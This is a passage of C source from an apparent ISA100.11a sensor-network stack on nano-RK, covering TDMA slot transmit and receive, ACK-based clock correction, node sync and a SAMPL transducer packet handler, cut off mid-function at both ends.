setNewDisplay(9, destAddr-1);
}
else
{
//if (isTransmitLinkPresent(isa_rfRxInfo.pPayload)){
if(TransmitLinkPresent == true){
//if yes, then place the message on the Queue again
enQueue (destAddr, 0, isa_rfRxInfo.length, isa_rfRxInfo.pPayload, NULL);
// printf("packet forwarded to %d", destAddr);
isa_rx_pkt_release();
setNewDisplay(9, destAddr-1);
}
else{
printf("No Transmit link for graph config for %d- dropped", destAddr);
isa_rx_pkt_release();
}
}
}
else if(message->type==ADD_LINK)
{
           // printf("Received configure Link data from %d\r\n",isa_rfRxInfo.pPayload[SRC_INDEX]);
if(destAddr == dmo.dlAddress)
{
                configLink = (CONFIG_LINK *) &message->data;
addLink(configLink->slotNumber,configLink->neighborId,configLink->graphId,configLink->linkType,configLink->graphType);
isa_rx_pkt_release();
setNewDisplay(11, destAddr-1);
}
else
{
// if (isTransmitLinkPresent(isa_rfRxInfo.pPayload)){
if(TransmitLinkPresent == true){
//if yes, then place the message on the Queue again
enQueue (destAddr, 0, isa_rfRxInfo.length, isa_rfRxInfo.pPayload, NULL);
// printf("packet forwarded to %d", destAddr);
isa_rx_pkt_release();
setNewDisplay(11, destAddr-1);
}
else{
printf("No Transmit Link for Add link message for %d- dropped", destAddr);
isa_rx_pkt_release();
}
}
}
else if (message->type==NEIGHBOR_TABLE_REPORT){ //if it is a neighbor table report,
if (isa_node_mode==ISA_GATEWAY){
//array[SRC_INDEX] |= ((uint16_t)1<<candidate->neighbor);
printf ("Received Candidate Table frm %d\r\n",isa_rfRxInfo.pPayload[SRC_INDEX]);
//need to print the neighbor info now
            neighborTable = (NEIGHBOR_TABLE *) &message->data; // cast payload to neighbor table
candidate = &neighborTable->candidate;
adjacencyMatrix[isa_rfRxInfo.pPayload[SRC_INDEX]] = 0;
for (i = 0; i < neighborTable->numberOfNeighbors; i++){
adjacencyMatrix[isa_rfRxInfo.pPayload[SRC_INDEX]] |= ((uint16_t)1<<candidate->neighbor);
//printf ("\t%d", candidate->neighbor);
candidate++;
}
putchar('\n');
putchar('\r');
putchar('n');
isa_rx_pkt_release();
}
else{ // if I am not the gateway, forward to my clock source
enQueue (isa_clk_src_id, 0, isa_rfRxInfo.length, isa_rfRxInfo.pPayload, NULL);
isa_rx_pkt_release();
setNewDisplay(13, isa_rfRxInfo.pPayload[SRC_INDEX]-1);
}
}
else if(message->type==FLUSH_CANDIDATE_TABLE)
{
printf("Received flush candidate table %d\r\n",isa_rfRxInfo.pPayload[SRC_INDEX]);
if(destAddr == dmo.dlAddress)
{
flushCandidateEntries();
isa_rx_pkt_release();
}
else
{
if (isTransmitLinkPresent(isa_rfRxInfo.pPayload)){
//if yes, then place the message on the Queue again
enQueue (destAddr, 0, isa_rfRxInfo.length, isa_rfRxInfo.pPayload, NULL);
// printf("packet forwarded to %d", destAddr);
isa_rx_pkt_release();
}
else{
printf("No Transmit link for Flush message for %d- dropped\r\n", destAddr);
isa_rx_pkt_release();
}
}
}
else printf ("Unknown message type\r\n");
//nrk_gpio_clr(NRK_DEBUG_3);
}
#ifdef LED_DEBUG
nrk_led_clr (1);
#endif
}
/**
* isa_release_rx_packet()
*
* This function releases the link layer's hold on the rx buffer.
* This must be called after a packet is received before a new
* packet can be buffered! This should ideally be done by the
* network layer.
*
*/
void isa_rx_pkt_release()
{
isa_rx_data_ready = 0;
}
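/*
 * Editor's sketch (guarded out of the build): the intended
 * check/get/release sequence for the single RX buffer described in
 * the comments above. Holding the buffer across a slot risks losing
 * the next packet.
 */
#ifdef DOC_EXAMPLE_RX_FLOW
void rx_flow_example (void)
{
    uint8_t len, *buf;
    int8_t rssi;
    isa_wait_until_rx_pkt ();           /* blocks on isa_rx_pkt_signal */
    buf = isa_rx_pkt_get (&len, &rssi); /* NULL if nothing is pending */
    if (buf != NULL) {
        printf ("got %d bytes, rssi %d\r\n", len, rssi);
        isa_rx_pkt_release ();          /* free the buffer for the next packet */
    }
}
#endif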
/**
* _isa_tx()
*
* This function is the low level TX function.
 * It is only called from the slot timer path and transmits the highest
 * priority packet queued for the link assigned to the active slot.
*
* Arguments: slot is the active slot set by the interrupt timer.
*/
void _isa_tx (DLMO_LINK * link, uint16_t slot)
{
uint8_t DHDR; // Data link layer header sub-header, currently used as ACK control
uint8_t c;
uint8_t n;
uint8_t i;
int8_t tmp;
volatile uint8_t timeout;
volatile uint8_t offsetSec, curSec;
volatile uint16_t offsetNanoSec;
volatile int16_t time_correction, time_correction1;
uint8_t tmp_nrk_prev_timer_val;
volatile ISA_QUEUE *transmitEntry;
// load header
isa_rfTxInfo.cca = true;
//the link should be a transmit link and either have a neighbor configured or a graph configured
if(link->linkType == TX_NO_ADV )
{
MESSAGE* message;
//if (check==5) nrk_terminate_task();//Azriel killed after 5 transmits
//find if there is anything in the Queue to be transmitted
transmitEntry = getHighPriorityEntry(link);
if (transmitEntry == NULL){
//printf("Nothing in the queue to transmit on slot %d ", slot);
return;
}
previous_tx_slot = slot;
isa_rfTxInfo.pPayload = transmitEntry->tx_buf;
#ifdef TX_DEBUG
//printf("TX Payload is: %s.\n\r", isa_rfTxInfo.pPayload);
#endif
isa_rfTxInfo.length=transmitEntry->length;
DHDR = configDHDR(link);
isa_rfTxInfo.pPayload[DHDR_INDEX] = DHDR;
//isa_rfTxInfo.pPayload[SLOT_INDEX] = (uint8_t)(global_slot & 0xFF);
//Change the src id only if not neighbor table
        message = (MESSAGE *) &isa_rfTxInfo.pPayload[PKT_DATA_START];
if (message->type != NEIGHBOR_TABLE_REPORT)isa_rfTxInfo.pPayload[SRC_INDEX] = isa_id; //replace the source id only if it is not a neighbor table report
else if (message->type == NEIGHBOR_TABLE_REPORT){
//do nothing
}
transmitEntry->numTries++;
#ifdef JOIN_PROCESS
if(slot>=22 && isa_node_mode == ISA_GATEWAY){
for(i=0;i<29;i++){
isa_rfTxInfo.pPayload[DAUX_INDEX+i]=DAUX[i];
//printf("DAUX[%d]=%d\r\n",i,isa_rfTxInfo.pPayload[DAUX_INDEX+i]);
}
}
#endif
}
else if(link->linkType == ADV)
{
//putchar('a');
//nrk_gpio_set(NRK_DEBUG_1);
isa_rfTxInfo.pPayload = adv_buf;
isa_rfTxInfo.length = DAUX_INDEX + sizeof(DLMO_DAUX) + 1; //sizeof(DLMO_DAUX) should be 21
//isa_rfTxInfo.length = DHDR_INDEX + sizeof(uint8_t) + 1;
DHDR = configDHDR(link);
isa_rfTxInfo.pPayload[DHDR_INDEX] = DHDR;
        isa_rfTxInfo.pPayload[SRC_INDEX] = isa_id; //change
        isa_rfTxInfo.pPayload[SLOT_INDEX] = (uint8_t)(global_slot & 0xFF);
DLMO_DAUX* advertise;
        advertise = (DLMO_DAUX *) &isa_rfTxInfo.pPayload[DAUX_INDEX]; // take the address; assigning the byte value was a bug
advertise->adSelection = 0;
//nrk_gpio_clr(NRK_DEBUG_1);
}
// FIXME a small bug. should not happen and should be fixed in _isa_init_sync()
//if(AFTER_FIRST_SYNC == 1){
_nrk_high_speed_timer_reset();
nrk_high_speed_timer_wait(0,WAIT_TIME_BEFORE_TX);
//AFTER_FIRST_SYNC = 0;
//}
#ifdef TX_RX_DEBUG
nrk_gpio_set(NRK_DEBUG_1);
//printf("T\r\n");
#endif
if(rf_tx_tdma_packet (&isa_rfTxInfo,slot_start_time,isa_param.tx_guard_time,&tx_start_time))
{
//if(link->linkType==TX_NO_ADV)transmitEntry->transmitPending = false;
txCount++;//change for packet loss
nrk_gpio_clr(NRK_DEBUG_1);
nrk_led_toggle(RED_LED);
// putchar ('t');
//("rx_start_time is %d.\n\r",_nrk_high_speed_timer_get());
offsetY = tx_start_time - slot_start_time;
// printf("%d.\n\r",offsetY);
#ifdef HIGH_TIMER_DEBUG
//printf("In isa.c _isa_tx(): offsetY is %d, tx_start_time is %d\n\r",offsetY,tx_start_time);
#endif
}
nrk_event_signal (isa_tx_done_signal);
// ACK required
if(DHDR & (1<<7)) { //&& isa_node_mode!=ISA_GATEWAY){ //Azriel
rf_polling_rx_on ();
nrk_gpio_set(NRK_DEBUG_1);
_nrk_high_speed_timer_reset();
nrk_high_speed_timer_wait(0,CPU_PROCESS_TIME);
//nrk_gpio_set(NRK_DEBUG_1);
// Timing for waiting for receiving ACK
timeout = _nrk_os_timer_get();
timeout+=2; // 2ms
n = 0;
while ((n = rf_rx_check_sfd()) == 0) {
if (_nrk_os_timer_get() > timeout) {
tmp = slot - previous_tx_slot;
if(slot == previous_tx_slot)
slot_expired += 25;
else{
tmp = slot - previous_tx_slot;
if(tmp>0)
slot_expired += tmp;
else
slot_expired += 25+tmp;
}
//printf("%d,%d,%d,%d,%d\n\r",slot_expired,tmp_curSec,tmp_offsetSec,tmp_offsetNanoSec,++tmp_count);
//printf("%d,%d\n\r",slot_expired,isa_param.channel);
//printf("%d,%d,%d\n\r",slot_expired,slot,previous_tx_slot);
//spend too much time on waiting for a pkt's arrival
rf_rx_off ();
nrk_gpio_clr(NRK_DEBUG_1);
#ifdef LED_DEBUG
nrk_led_clr(1);
#endif
#ifdef RX_DEBUG
putchar('s');
// printf("%d", slot);
// printf("sfd times out.\n\r");
#endif
//nrk_gpio_clr(NRK_DEBUG_1);
packetsLost++;
if(transmitEntry->numTries >= MAX_RETRIES){
if (transmitEntry-> slot_callback == NULL ) isaFreePacket(transmitEntry);
else transmitEntry-> slot_callback(transmitEntry, FAILURE);
}
return;
}
}
//nrk_gpio_clr(NRK_DEBUG_1);
timeout = _nrk_os_timer_get();
        timeout += 2; // 2ms
if (n != 0) {
n = 0;
//printf("Packet on its way\n\r");
if ( BITGET(DHDR,2)) c = 4 ;
else c = 2;
while ((n = rf_polling_rx_packet (true, c)) == 0) { //changed to 2 by Azriel for gateway
if (_nrk_os_timer_get () > timeout) {
#ifdef RX_DEBUG
printf("packet is too long, times out.\n\r");
#endif
packetsLost++;
tmp_curSec = _nrk_os_timer_get();
if(transmitEntry->numTries == MAX_RETRIES){
if (transmitEntry-> slot_callback == NULL ) isaFreePacket(transmitEntry);
else transmitEntry-> slot_callback(transmitEntry, FAILURE);
// spend too much time on receiving pkt.
}
return; // huge timeout as fail safe
}
//if(n==-6)
// printf("%d\n\r",_nrk_os_timer_get());
}
}
if (n !=1){ //size of packet must have been wrong
putchar('f');
printf("f channel %d\r\n",currentChannel);
packetsLost++;
}
rf_rx_off ();
// if (n==1)
nrk_gpio_clr(NRK_DEBUG_1);
if (n == 1) {// successfully received ACK
rxCount++;
//isa_rx_data_ready = 1;
DHR = isa_rfRxInfo.pPayload[DHR_INDEX];
#ifdef ACK_DEBUG
#endif // ACK_DEBUG
if((DHDR & (1<<7))) { // &&isa_node_mode!=ISA_GATEWAY){
slot_expired = 0;
// ************************* Trying time correction
if(DHR & (1<<7)){
                offsetX = (((uint16_t) isa_rfRxInfo.pPayload[OFFSET_HIGH]) << 8) | isa_rfRxInfo.pPayload[OFFSET_LOW];
#ifdef ACK_DEBUG
nrk_led_toggle(ORANGE_LED);
// putchar('a');
#endif // ACK_DEBUG
// check++;
time_correction = offsetX - offsetY - 1400;
//-1400 is the error in reading used for calculating the offset
#ifdef HIGH_TIMER_DEBUG
printf("time correction is %d.\n\r", time_correction);
#endif
// printf("%d.\n\r", time_correction);
timeout=50;
if(time_correction >= 0){
curSec = _nrk_os_timer_get();
offsetSec = (time_correction/7325)+1;
                        offsetNanoSec = 7325-(time_correction%7325); // "NanoSec" is a misnomer: the unit is high-speed timer ticks
_nrk_os_timer_stop();
// nrk_gpio_set(NRK_DEBUG_1);
_nrk_high_speed_timer_reset();
nrk_high_speed_timer_wait(0,offsetNanoSec);
_nrk_os_timer_set(curSec+offsetSec);
// nrk_gpio_clr(NRK_DEBUG_1);
_nrk_os_timer_start();
// _nrk_set_next_wakeup(10);
nrk_spin_wait_us(50);
}else if(time_correction<0){
_nrk_os_timer_stop();
#ifdef CORRECTION
nrk_gpio_set(NRK_DEBUG_2);
//nrk_high_speed_timer_wait(0,22800); // for test
nrk_gpio_clr(NRK_DEBUG_2);
#endif
_nrk_high_speed_timer_reset();
nrk_high_speed_timer_wait(0,-time_correction);
_nrk_os_timer_start();
}
}
}
            // Check bits 5:4 of the DHR: 0 means a clean ACK. If they are nonzero, an error
            // occurred downstream and the message must stay in the queue for a retry.
if(transmitEntry->numTries == MAX_RETRIES || ((DHR & (3<<4))==0)){
if (transmitEntry-> slot_callback == NULL ) isaFreePacket(transmitEntry);
else transmitEntry-> slot_callback(transmitEntry, SUCCESS);
}
}
}//wait for ACK
}
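/*
 * Worked example of the clock correction above, using the constants in
 * the code (7325 high-speed-timer ticks per 1ms OS tick, 1400 ticks of
 * fixed read error): with offsetX = 9000 and offsetY = 600,
 * time_correction = 9000 - 600 - 1400 = 7000 ticks. Since it is
 * non-negative, offsetSec = 7000/7325 + 1 = 1 OS tick and
 * offsetNanoSec = 7325 - (7000 % 7325) = 325 ticks, so the OS timer is
 * advanced one tick after a 325-tick spin. "NanoSec" is historical;
 * the unit is high-speed timer ticks.
 */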
/*
uint8_t _isa_join_process ()
{
int8_t n;
uint16_t timeout;
uint16_t timer;
uint8_t tdma_start_tick;
uint8_t battery_save_cnt;
uint8_t last_nrk_tick;
uint8_t i;
timer=0;
battery_save_cnt=0;
while(1)
{
rf_set_rx (&isa_rfRxInfo, isa_param.channel); // sets rx buffer and channel
rf_polling_rx_on ();
n = 0;
_isa_sync_ok = 0;
last_nrk_tick=0; // should be 0 going in
//_nrk_prev_timer_val=250;
//_nrk_set_next_wakeup(250);
//_nrk_os_timer_set(0);
//timeout=200;
while ((n = rf_rx_check_sfd()) == 0) {
// every OS tick
if(last_nrk_tick!=_nrk_os_timer_get()) {
last_nrk_tick=_nrk_os_timer_get();
timer++;
if(timer>ISA_TOKEN_TIMEOUT){
timer=0;
break;
}
}
}
//_nrk_high_speed_timer_reset();
tdma_start_tick=_nrk_os_timer_get();
timeout = tdma_start_tick+4;
// an interrupt could happen in here and mess things up
if (n != 0) {
n = 0;
// Packet on its way
while ((n = rf_polling_rx_packet (false,128)) == 0) {
if (_nrk_os_timer_get () > timeout)
{
//nrk_kprintf( PSTR("Pkt timed out\r\n") );
break; // huge timeout as failsafe
}
}
}
rf_rx_off ();
if (n == 1){ //&& isa_rfRxInfo.length>0) {
// if(isa_rfRxInfo.pPayload[SRC_INDEX]==isa_clk_src_id){//change
// CRC and checksum passed
if(isa_rfRxInfo.pPayload[DAUX_INDEX+7]==10){ // DAUX packet
isa_rx_data_ready = 1;
//global_slot = (volatile)isa_rfRxInfo.pPayload[SLOT_INDEX];
isa_set_channel_pattern(isa_rfRxInfo.pPayload[DAUX_INDEX+9]); //set channel hopping pattern
channelIndex=isa_rfRxInfo.pPayload[DAUX_INDEX+10];
currentChannel = slottedPattern[channelIndex];
isa_set_channel(currentChannel);
for(i=0;i<4;i++){ // set tx slots
if(isa_rfRxInfo.pPayload[DAUX_INDEX+19+i]==0)
break;
else{
isa_tdma_tx_mask |= ((uint32_t) 1) << isa_rfRxInfo.pPayload[DAUX_INDEX+19+i];
isa_sched[isa_rfRxInfo.pPayload[DAUX_INDEX+19+i]] = 1;
tx_slot_from_join[i]=isa_rfRxInfo.pPayload[DAUX_INDEX+19+i];
// printf("TX:%d\r\n",tx_slot_from_join[i]);
}
}
for(i=0;i<4;i++){ // set rx slots
if(isa_rfRxInfo.pPayload[DAUX_INDEX+23+i]==0)
break;
else{
isa_tdma_rx_mask |= ((uint32_t) 1) << isa_rfRxInfo.pPayload[DAUX_INDEX+23+i];
isa_sched[isa_rfRxInfo.pPayload[DAUX_INDEX+23+i]] = 1;
}
}
nrk_event_signal(SIG(isa_rx_pkt_signal));
break;
}
// }
}
}
_isa_join_ok=1;
isa_rx_pkt_release();
return _isa_join_ok;
}
*/
int8_t isa_join_ready()
{
if (_isa_join_ok == 1)
return NRK_OK;
else
return NRK_ERROR;
}
/** FIXME: this is a temporary function and needs a fuller specification
* _isa_init_sync()
*
* This function is used for join process.
 * A node that wants to join the network keeps listening until it
 * hears its clock source, then establishes its first sync.
*
* Return: _isa_sync_ok.
*/
uint8_t _isa_init_sync ()
{
int8_t n;
uint16_t timeout;
uint16_t timer;
uint8_t tdma_start_tick;
uint8_t battery_save_cnt;
uint8_t last_nrk_tick;
uint8_t tmp_nrk_prev_timer_val;
//volatile uint16_t sfd_start_time;
//printf("%d,%d\n\r",isa_param.channel,global_slot);
// DISABLE_GLOBAL_INT ();
timer=0;
battery_save_cnt=0;
while(1)
{
// printf("Channel%d ,channelINdex %d\r\n",currentChannel,channelIndex);
//printf("Init sync \r\n");
isa_rfRxInfo.pPayload[DHDR_INDEX]=1; //configDHDR(0); This will have to change
//isa_rfRxInfo.pPayload[SLOT_INDEX]=global_slot;
#ifdef LED_DEBUG
nrk_led_set(1);
#endif
rf_set_rx (&isa_rfRxInfo, isa_param.channel); // sets rx buffer and channel
rf_polling_rx_on ();
n = 0;
_isa_sync_ok = 0;
last_nrk_tick=0; // should be 0 going in
//_nrk_prev_timer_val=250;
_nrk_set_next_wakeup(250);
_nrk_os_timer_set(0);
//timeout=200;
while ((n = rf_rx_check_sfd()) == 0) {
// every OS tick
if(last_nrk_tick!=_nrk_os_timer_get()) {
last_nrk_tick=_nrk_os_timer_get();
timer++;
if(timer>ISA_TOKEN_TIMEOUT){
timer=0;
break;
}
}
}
//printf("3 \n");
_nrk_high_speed_timer_reset();
// capture SFD transition with high speed timer
//sfd_start_time=_nrk_high_speed_timer_get();
tdma_start_tick=_nrk_os_timer_get();
timeout = tdma_start_tick+4;
// an interrupt could happen in here and mess things up
if (n != 0) {
n = 0;
// Packet on its way
while ((n = rf_polling_rx_packet (false,128)) == 0) {
// printf("4 \n");
if (_nrk_os_timer_get () > timeout)
{
//nrk_kprintf( PSTR("Pkt timed out\r\n") );
break; // huge timeout as failsafe
}
}
}
rf_rx_off ();
//printf("5 \n");
if (n == 1 /*&& isa_rfRxInfo.length>0*/) {
int DHDR = isa_rfRxInfo.pPayload[DHDR_INDEX];
// if(isa_rfRxInfo.pPayload[SRC_INDEX]==isa_clk_src_id && isa_rfRxInfo.pPayload[DEST_INDEX] == dmo.dlAddress){//change
//if(isa_rfRxInfo.pPayload[SRC_INDEX]==isa_clk_src_id && DHDR & (1<<4)){
if(isa_rfRxInfo.pPayload[SRC_INDEX]==isa_clk_src_id && DHDR &(1<<4)){
// CRC and checksum passed
isa_rx_data_ready = 1;
//rtl_rx_slot = 0;
//DHDR = (volatile)isa_rfRxInfo.pPayload[DHDR_INDEX];
global_slot = (volatile)isa_rfRxInfo.pPayload[SLOT_INDEX];
nrk_led_toggle(GREEN_LED);
putchar ('i');
// nrk_event_signal(SIG(isa_rx_pkt_signal));
break;
//
}
}
}
#ifdef LED_DEBUG
nrk_led_clr(1);
#endif
//printf("os_timer=%d\r\n",_nrk_os_itimer_get());
#ifdef INIT_SYNC
nrk_gpio_set(NRK_DEBUG_1);
#endif
_isa_sync_ok = 1;
isa_rx_pkt_release();
tmp_nrk_prev_timer_val=_nrk_prev_timer_val;
_nrk_os_timer_stop();
_nrk_os_timer_reset();
/*
 * If this reset is skipped, the next wakeup becomes unpredictable; the root cause is not yet understood (FIXME).
*/
_nrk_set_next_wakeup(10);
_nrk_os_timer_set(7);
nrk_high_speed_timer_wait(0,SFD_TO_NEXT_SLOT_TIME);
//_nrk_os_timer_reset();
_nrk_os_timer_start();
//_nrk_prev_timer_val=9;
//printf("%d\n\r", _nrk_os_timer_get());
nrk_cur_task_TCB->next_wakeup = 10;
//printf("%d\n\r",_nrk_prev_timer_val);
// _nrk_high_speed_timer_reset();
// slot_start_time=_nrk_high_speed_timer_get();
#ifdef INIT_SYNC
nrk_gpio_clr(NRK_DEBUG_1);
#endif
return _isa_sync_ok;
}
void isa_nw_task ()
{
uint8_t slot;
uint16_t next_slot_offset = 0;
uint8_t FIRST = 1;
DLMO_LINK * link;
_isa_ready = 0;
// wait for isa ready
do {
nrk_wait_until_next_period ();
}while (_isa_ready == 0);
_isa_ready = 1;
//nrk_gpio_clr(NRK_DEBUG_0);
//nrk_time_get (&last_slot_time);// dont know if it is useful
while (1) {
//putchar('n');
_nrk_high_speed_timer_reset();
slot_start_time = _nrk_high_speed_timer_get();
nrk_gpio_set(NRK_DEBUG_1);
nrk_gpio_clr(NRK_DEBUG_1);
// reset high speed timer and then record the timer value used for calculating offsets
//nrk_time_get (&last_slot_time);// dont know if it is useful
// last_slot = global_slot; //global_slot has been initialized to MAX_ISA_GLOBAL_SLOTS in isa_init()
// if (last_slot > MAX_ISA_GLOBAL_SLOTS)
// last_slot -= (MAX_ISA_GLOBAL_SLOTS+1);
current_global_slot = global_slot;
/* global_slot should be wrapped */
if(global_slot > ISA_SLOTS_PER_FRAME * 3)
{
global_slot = global_slot % ISA_SLOTS_PER_FRAME;
global_cycle++;
}
/*
if (global_slot > MAX_ISA_GLOBAL_SLOTS) {
global_slot -= MAX_ISA_GLOBAL_SLOTS;
global_cycle++;
}
*/
slot = global_slot % ISA_SLOTS_PER_FRAME;
if(_isa_sync_ok == 1){
#ifdef CHANNEL_HOPPING
channelIndex += next_slot_offset;
currentChannel = slottedPattern[(channelIndex)&0x0F];//equivalent to mod by 16
isa_set_channel(currentChannel);
/*
if(slot>=22 && isa_node_mode == ISA_GATEWAY){
slowIndex = slowIndex % 3;
currentChannel = slowPattern[slowIndex];
isa_set_channel(currentChannel);
if(slot>=24)
slowIndex++;
}
*/
//printf("CH:%d SL: %d\r\n",currentChannel,slot);
#endif
//printf("%d,%d\n\r",currentChannel,(channelIndex)&0x0F);
//printf("isa_rx_data_ready:%d\r\n",isa_rx_data_ready);
// if TX slot mask and tx ready, send a packet
#ifdef JOIN_PROCESS
if(slot>=22 && isa_node_mode == ISA_GATEWAY)
isa_tx_data_ready |= ((uint32_t) 1 << slot);
#endif
#ifdef TX_RX_DEBUG
//printf("R\r\n");
// nrk_gpio_set(NRK_DEBUG_0);
#endif
/*
* who is the neighbor that this slot is configured for?
*/
link = findLink(slot);
if(link != NULL){
//what type of link is this
if (link->linkType == RX){
_isa_rx (link, slot);
}
else if (link->linkType == TX_NO_ADV){
_isa_tx(link , slot);
}
else if(link->linkType == ADV){//Added by Vignesh.
_isa_tx(link,slot);
}
//find the highest priority entry in the queue (if any)
//if (transmitEntry = hightestPriorityEntry(neighbor) != NULL){
// _isa_tx(transmitEntry, link);
// }
}
//printf("isa tx slot %d.\n\r",slot);
// printf("TX %d,%d,%d\n\r",currentChannel,(channelIndex)&0x0F,slot);
//printf("tx\n\r");
// _isa_tx (slot);
// previous_tx_slot = slot;
#ifdef HIGH_TIMER_DEBUG
//printf("TX later, high speed timer value is %d.\n\r", _nrk_high_speed_timer_get());
#endif
} else {
///do joining or sync request here
// DHDR = configDHDR(0);
if(isa_node_mode != ISA_GATEWAY){//change
#ifdef JOIN_PROCESS
if(!_isa_join_ok){
_isa_join_process();
}
#endif
                DHDRcount = 0; // force the next TX to request time correction
_isa_sync_ok = _isa_init_sync();
//printf("waiting for sync...isa_sync_ok is %d.\n\r",_isa_sync_ok);
}else if (isa_node_mode == ISA_GATEWAY){
_isa_sync_ok = 1;
}
}
if(slot_expired >= EXPIRATION && isa_node_mode != ISA_GATEWAY){
//printf("re-sync\n\r");
_isa_sync_ok = 0;
slot_expired = 0;
global_slot = 0;
next_slot_offset = 0;
resync_times++;
if(isa_id!=1){
channelIndex = isa_clk_src_id;
currentChannel = slottedPattern[channelIndex];
}else{
channelIndex = 0;
currentChannel = slottedPattern[channelIndex];
}
isa_set_channel(currentChannel);
}else{
//printf("Channel%d ,channelINdex %d\r\n",currentChannel,channelIndex);
//printf("global_slot is %d. global cycle is %d.\n\r",global_slot,global_cycle);
next_slot_offset = isa_get_slots_until_next_wakeup (global_slot);
// printf("NOS:%d\n\r",next_slot_offset);
//printf("%d,%d,%d,%d\n\r",_nrk_os_timer_get (),_nrk_get_next_wakeup (),global_slot,next_slot_offset);
global_slot += next_slot_offset;
//nrk_clr_led (1);
#ifdef LED_SLOT_DEBUG
nrk_led_clr(0);
#endif
offsetY = 0;
// printf("%d\n\r",next_slot_offset);
//nrk_gpio_set(NRK_DEBUG_2);
if (txCount % 1000 == 0){
// printf ("PL:%d\r\n",packetsLost);
}
	    // Check whether an advertisement is due (non-gateway nodes only)
if (isa_node_mode!=ISA_GATEWAY){
if (isDiscoveryAlertDue()){
if (sendAdv()== ISA_ERROR){
printIsaError();
}
printf ("AdvSent\r\n");
updateLastSentTime();
setNewDisplay(13, dmo.dlAddress-1);
}
}
nrk_wait_until_next_n_periods (next_slot_offset);
// nrk_gpio_clr(NRK_DEBUG_2);
#ifdef LED_SLOT_DEBUG
nrk_led_set(0);
#endif
//}
//nrk_set_led (1);
// Set last_slot_time to the time of the start of the slot
}
}
}
void isa_task_config ()
{
isa_task.task = isa_nw_task;
nrk_task_set_stk( &isa_task, isa_task_stack, ISA_STACK_SIZE);
isa_task.prio = 20;
isa_task.FirstActivation = TRUE;
isa_task.Type = BASIC_TASK;
isa_task.SchType = PREEMPTIVE;
isa_task.period.secs = 0;
isa_task.period.nano_secs = 10*NANOS_PER_MS;
isa_task.cpu_reserve.secs = 0;
isa_task.cpu_reserve.nano_secs = 0;
isa_task.offset.secs = 0;
isa_task.offset.nano_secs = 0;
nrk_activate_task (&isa_task);
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/projects/SAMPL/pkt_handlers/transducer_pkt.c
#include <globals.h>
#include <../include/sampl.h>
#include <control_pkt.h>
#include <ack_pkt.h>
#include <transducer_pkt.h>
#ifdef NANORK
#include <transducer_handler.h>
#include <nrk.h>
#include <nrk_error.h>
int8_t transducer_generate(SAMPL_UPSTREAM_PKT_T *pkt,SAMPL_DOWNSTREAM_PKT_T *ds_pkt )
{
TRANSDUCER_REPLY_PKT_T r;
TRANSDUCER_CMD_PKT_T p;
ACK_PKT_T a;
uint8_t num_pkts,i,selected,checksum;
uint8_t status;
uint8_t pkt_generated;
pkt_generated=0;
pkt->payload_len=0;
pkt->num_msgs=0;
status=0;
checksum=transducer_cmd_pkt_get(&p, ds_pkt->payload);
if(checksum==p.checksum )
{
for(i=0; i<p.num_msgs; i++ )
{
if(p.msg[i].mac_addr==my_mac || p.msg[i].mac_addr==255 )
{
pkt_generated=1;
// Setup a blank default reply pkt
r.mac_addr=my_mac;
r.len=0;
r.type=0;
r.payload=&(pkt->payload[pkt->payload_len+TRANSDUCER_REPLY_HEADER_SIZE]);
// Call application transducer handler
status=transducer_handler( p.msg[i].key, p.msg[i].value, &r);
if( status==0) pkt->error_code=1;
// Copy header elements into packet
pkt->payload[pkt->payload_len]=r.mac_addr;
pkt->payload[pkt->payload_len+1]=r.type;
pkt->payload[pkt->payload_len+2]=r.len;
// Update new length of packet
pkt->payload_len+=r.len+TRANSDUCER_REPLY_HEADER_SIZE;
pkt->num_msgs++;
pkt->pkt_type=TRANSDUCER_REPLY_PKT;
}
}
}
else
{
pkt_generated=1;
nrk_kprintf( PSTR( "Actuator packet failed checksum\r\n"));
nrk_kprintf( PSTR(" pkt: " ));
printf( "%d",p.checksum );
nrk_kprintf( PSTR(" calc: " ));
printf( "%d\r\n",checksum );
// build NCK reply packet
a.mac_addr=my_mac;
pkt->payload_len = ack_pkt_add( &a, pkt->payload,0);
pkt->num_msgs=1;
pkt->pkt_type=ACK_PKT;
pkt->error_code=1; // set error type for NCK
}
if(pkt_generated==0)
{
pkt->pkt_type=EMPTY_PKT;
pkt->num_msgs=0;
pkt->payload_len=0;
}
return NRK_OK;
}
int8_t transducer_p2p_generate(SAMPL_PEER_2_PEER_PKT_T *pkt)
{
ACK_PKT_T p;
p.mac_addr=my_mac;
pkt->payload_len = ack_pkt_add( &p, pkt->payload,0);
return NRK_OK;
}
int8_t transducer_aggregate(SAMPL_UPSTREAM_PKT_T *in, SAMPL_UPSTREAM_PKT_T *out)
{
uint8_t len,i,j,k,dup;
TRANSDUCER_REPLY_PKT_T p1, p2;
for(i=0; i<in->num_msgs; i++ )
{
dup=0;
// get next ping packet to compare against current outgoing list
transducer_reply_pkt_get( &p1, in->payload, i );
for(k=0; k<out->num_msgs; k++ )
{
// get packet from outgoing list and compare against incomming packet
transducer_reply_pkt_get( &p2, out->payload, k );
if(p1.mac_addr==p2.mac_addr && p1.type==p2.type) dup=1;
}
if(dup==0)
{
// if packet is unique, add to outgoing packet
//out->payload_len=transducer_reply_pkt_add( &p1, out->payload, out->num_msgs );
len=transducer_reply_pkt_add( &p1, out->payload, out->num_msgs );
if(len>0)
{
out->payload_len=len;
out->num_msgs++;
}
else
{
// Set overflow error code
out->error_code=1;
}
}
}
return NRK_OK;
}
#else
#define my_mac 0
#define RF_MAX_PAYLOAD_SIZE 128
#endif
uint8_t transducer_cmd_pkt_get( TRANSDUCER_CMD_PKT_T *p, uint8_t *buf)
{
uint8_t i,c;
// 1 byte offset for number of messages
p->checksum=buf[0];
p->num_msgs=buf[1];
c=buf[1];
p->msg=(TRANSDUCER_MSG_T *) &buf[2];
for(i=0; i<p->num_msgs*sizeof(TRANSDUCER_MSG_T); i++ )
c+=buf[2+i];
return c;
}
uint8_t transducer_cmd_pkt_checksum( TRANSDUCER_CMD_PKT_T *p, uint8_t *buf)
{
uint8_t i,c;
c=buf[1];
for(i=0; i<p->num_msgs*3; i++ )
c+=buf[2+i];
p->checksum=c;
  buf[0]=c;
  return c; // the function is declared uint8_t; the original fell off the end without returning
}
uint8_t transducer_cmd_pkt_add( TRANSDUCER_CMD_PKT_T *p, uint8_t *buf)
{
uint8_t i;
// pack the number of messages into the payload
buf[1]=p->num_msgs;
// Copy the data to the payload
for(i=0; i<p->num_msgs; i++ )
{
buf[2+(i*3)]=p->msg[i].mac_addr;
buf[2+(i*3)+1]=p->msg[i].key;
